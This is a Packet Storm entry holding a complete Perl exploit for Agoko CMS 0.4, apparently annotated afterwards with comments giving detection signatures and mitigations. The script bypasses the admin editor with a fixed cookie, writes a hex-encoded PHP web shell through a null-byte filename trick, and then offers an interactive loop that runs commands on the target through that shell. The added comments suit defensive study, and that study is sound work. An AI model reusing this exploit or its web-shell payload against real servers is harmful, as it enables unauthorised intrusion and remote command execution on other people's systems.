Agoko CMS 0.4 Command Execution

2009-09-10T00:00:00
ID PACKETSTORM:81103
Type packetstorm
Reporter StAkeR
Modified 2009-09-10T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
# Usage banner.  The q~...~ literal is printed verbatim, so its text is part
# of the program's output and is reproduced here unchanged.
print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

~;
  
  
#>-----------<#  
#>- Working -<#  
#>-----------<#########################################  
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #  
# #  
# -------------------------------------------------- #  
# Agoko CMS <= 0.4 remote commands execution exploit #  
# by staker #  
# mail: staker[at]hotmail[dot]it #  
# -------------------------------------------------- #  
# #  
# [*] Usage -> perl [xpl.pl] [host] [path] #  
# [*] Example -> perl agk.pl localhost /Agoko #  
# #  
# shell already exists. #  
# #  
# Agoko[shell]:~$ uname -n -r #  
# #  
# death 2.6.27-7-generic #  
#######################################################  
  
  
use IO::Socket;  
use LWP::Simple;  
  
  
# Positional CLI arguments: target host and the CMS install path (see the
# usage banner above).  A missing path exits silently with status 0 instead
# of printing usage; a missing host is not checked here at all.
my $host = shift;
my $path = shift || exit(0);

# Entry point: check_shell() decides between reusing an existing web shell
# and attempting to plant one (both defined below).
check_shell($host,$path);
  
  
# Probe whether content/shell_vup.php already exists on the target and
# answers with the marker text "bany wtf".  If it does, hand over to
# load_cmd(); otherwise call inject_shell().
#
# Args: $_[0] target host, $_[1] CMS install path.  A missing path dies with
# `$!`, which carries no meaningful errno at this point (no syscall failed),
# so the message is effectively empty.
#
# Defender notes: every part of the request below is a fixed string and is
# therefore a usable detection signature in web-server logs and IDS rules:
# the path `/content/shell_vup.php`, the cookie `bany=love_me` and the
# User-Agent `Lynx (textmode)`.  A 200 response whose body contains
# "bany wtf" means a web shell is already planted on that host.
#
# NOTE: the empty `()` prototype only affects calls compiled after this
# definition; the top-level call to check_shell() above is compiled first
# and is unaffected.
sub check_shell() {
my $host = $_[0];
my $path = $_[1] || die $!;

# Raw HTTP/1.1 request, sent as-is by give_kt() (no client library).
my $packet = "GET /$path/content/shell_vup.php HTTP/1.1\r\n".
"Host: $host\r\n".
"Cookie: bany=love_me\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Connection: close\r\n\r\n";

# give_kt() returns the full response (headers + body) as one string; the
# match is case-insensitive and unanchored.
if (give_kt($host,$packet) =~ /bany wtf/i) {
print "[*] shell already exists.\n";
load_cmd($host,$path);
}
else {
print "[*] exploiting..\n";
inject_shell($host,$path);
}
}
  
  
# Attempt to write the web shell through the CMS page editor.
#
# Args: ($host, $path) as in check_shell().
#
# What the request does (all visible below): a POST to
# `admintools/editpage-2.php` whose `filename` field is `shell_vup.php`
# followed by a NUL byte (`\x00`), whose `text` field is the PHP payload, and
# whose submit label is `Speichern` ("Save").  Success is detected by the
# German status text "erfolgreich eingetragen" ("successfully entered") in
# the response; on failure the script dies.
#
# Defender notes / root cause (inferred from the request shape — confirm
# against the Agoko 0.4 source):
#  - The only credential sent is the fixed cookie `bany=love_me`; no login
#    or session token is involved, which suggests the admin editor's access
#    check can be satisfied by that cookie alone.  Mitigation: enforce real
#    server-side session authentication on everything under `admintools/`.
#  - The NUL byte in `filename` is a classic null-byte truncation attempt
#    against extension checks.  Mitigation: reject NUL bytes and any
#    filename that is not a plain allow-listed basename, and never write
#    user-supplied content into a directory served as PHP.
#  - Detection: a POST to `/admintools/editpage-2.php` with
#    `filename=shell_vup.php`, the User-Agent `Mozilla/4.5 [en] (Win95; U)`,
#    and the subsequent appearance of `content/shell_vup.php` on disk are
#    the indicators to alert on.
#
# NOTE: as with the other subs, the empty `()` prototype has no effect on
# the call in check_shell(), which is compiled earlier.
sub inject_shell() {
my ($host,$path) = @_;

# Payload, hex-escaped byte by byte.  It decodes to a minimal PHP web shell
# that executes the `cmd` query parameter and otherwise prints "bany wtf" --
# the same marker check_shell() probes for.  The decoded text is not
# reproduced here; the byte string is kept unchanged.
my $shell = "\x3C\x3F\x70\x68\x70\x20\x20\x20\x20\x20\x20\x65\x72\x72".
"\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67\x28\x45".
"\x5F\x41\x4C\x4C\x29\x3B\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28".
"\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x29".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x61\x73\x73".
"\x74\x68\x72\x75\x28\x73\x74\x72\x69\x70\x73\x6C\x61\x73".
"\x68\x65\x73\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64".
"\x27\x5D\x29\x29\x3B\x20\x20\x20\x20\x20\x20\x65\x6C\x73".
"\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x65\x28".
"\x22\x62\x61\x6E\x79\x20\x77\x74\x66\x22\x29\x3B\x20\x20".
"\x20\x20\x20\x20\x3F\x3E\x20";


# Form body: note the raw NUL after the filename and the German submit label.
my $data = "filename=shell_vup.php\x00&text=$shell&Submit=Speichern";

# Raw HTTP/1.1 POST; Content-Length is computed from the byte string above.
my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Cookie: bany=love_me\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($data)."\r\n".
"Connection: close\r\n\r\n".
$data;

# The CMS confirms a saved page with German status text.
if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)
{
load_cmd($host,$path)
}
else
{
die "[*] Exploit failed.\n";
}

}
  
  
# Interactive loop: read one line at a time from STDIN and send it as the
# `cmd` query parameter of content/shell_vup.php; LWP::Simple::getprint()
# fetches the URL and writes the response body straight to STDOUT.
#
# Args: $_[0] target host, $_[1] CMS install path.  Never returns; the
# loop ends only via exit(0) when the user types exit/quit/out (any case).
#
# Defender notes: each command produces a GET for
# `/content/shell_vup.php?cmd=...` in the web-server access log, and the
# command itself is sent in the URL unencoded, so the executed text is
# recoverable from the logs for incident reconstruction.  Any PHP file in a
# content directory taking a `cmd` parameter is worth alerting on.
sub load_cmd() {
my $host = $_[0];
my $path = $_[1];

while (1)
{
print "\nAgoko[shell]:~\$ ";
# chomp of an undef line (EOF on STDIN) leaves $cmd undef; the regex below
# then matches against "" with a warning and the loop continues.
chomp (my $cmd = <STDIN>);

exit(0) if $cmd =~ /^(exit|quit|out)+$/i;

getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
}
}
  
  
# Minimal raw HTTP transport: open a plain TCP connection to $input on port
# 80 (hard-coded, no TLS), send the pre-built request in $heads unchanged,
# read until the peer closes the connection, and return everything received
# (status line, headers and body) as one string.
#
# Args: $_[0] host, $_[1] the complete request text.  A missing request dies
# with `$!`, which is not meaningful here (no syscall has failed).
#
# Returns: the concatenated response, or undef if nothing was read -- callers
# match it against a regex directly, so an empty response just fails the
# match (with an "uninitialized value" warning under `use warnings`).
#
# Defender notes: because the request is hand-assembled rather than sent
# through a client library, its header set is small and fixed, which makes
# the traffic easy to fingerprint (see the User-Agent and Cookie values in
# the callers).
sub give_kt() {
my $input = $_[0];
my $heads = $_[1] || die $!;

my $result;
# The parentheses around the constructor make `|| die` apply to its return
# value; `$!` does carry the connect() error here.
my $socket = IO::Socket::INET->new(
PeerAddr => $input,
PeerPort => 80,
Proto => 'tcp'
) || die $!;

# send() is unchecked; a short or failed send is not detected.
$socket->send($heads);

# Line-by-line slurp on $_ until EOF; "Connection: close" in the callers'
# requests is what makes the server end the stream.  The socket is not
# closed explicitly and is released when $socket goes out of scope.
while (<$socket>) { $result .= $_; }

return $result;
}
  
  
`